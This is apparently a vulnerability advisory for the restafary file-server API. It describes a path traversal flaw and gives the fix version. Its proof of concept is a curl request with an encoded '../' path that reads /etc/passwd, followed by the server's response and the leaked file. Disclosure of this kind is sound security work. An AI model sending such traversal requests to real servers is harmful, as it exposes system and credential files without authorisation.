- restafary is a REpresentful State Transfer API for Creating, Reading, Using, Deleting files on a server from the web
- restafary can be configured with a root path, and all file operations are meant to be confined to that root.
- An attacker is able to provide a specially crafted path to access files outside of this specified root path.
- Note: this is only possible if the attacker has access to the restafary application.
Proof of Concept
curl -i -s -k -X 'GET' -H 'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' 'http://localhost:8000/api/v1/fs/..%2f..%2fetc/passwd'

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Accept-Ranges: bytes
Last-Modified: Sun Jul 12 2015 22:38:08 GMT-0700 (PDT)
Content-Length: 5581
Cache-Control: max-age=0
Date: Fri, 25 Mar 2016 17:30:29 GMT
Connection: keep-alive

##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
Upgrade to restafary version 1.6.1 or greater.